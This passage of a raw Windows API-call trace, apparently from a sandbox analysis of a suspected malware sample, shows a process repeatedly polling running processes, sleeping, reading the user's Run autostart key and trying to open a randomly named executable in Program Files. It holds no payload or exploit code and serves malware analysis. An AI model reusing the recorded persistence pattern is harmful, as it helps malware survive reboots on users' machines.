BaseAddress=0x45c4b8) returned 1 [0265.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0265.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.054] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.064] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.065] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.065] NtClose (Handle=0x14c) returned 0x0 [0266.065] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.065] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.065] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.066] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.066] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.066] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.173] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.190] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.190] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.190] NtClose (Handle=0x14c) returned 0x0 [0266.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.190] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.190] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.190] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.190] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.190] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.305] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.313] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.313] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.313] NtClose (Handle=0x14c) returned 0x0 [0266.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.313] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.313] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.313] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.313] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.407] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.425] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.425] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.425] NtClose (Handle=0x14c) returned 0x0 [0266.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.425] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.425] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.425] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.425] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.666] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.726] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.726] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.726] NtClose (Handle=0x14c) returned 0x0 [0266.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.726] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.726] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.727] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.727] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0266.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0266.876] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0266.903] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0266.903] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0266.903] NtClose (Handle=0x14c) returned 0x0 [0266.903] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.905] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.905] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0266.905] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0266.905] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0266.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0266.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0267.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0267.119] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0267.186] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0267.186] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0267.186] NtClose (Handle=0x14c) returned 0x0 [0267.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0267.186] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0267.186] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0267.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0267.186] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0267.186] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0267.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0267.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0267.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0267.377] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0267.983] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0267.983] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0267.983] NtClose (Handle=0x14c) returned 0x0 [0267.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0267.983] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 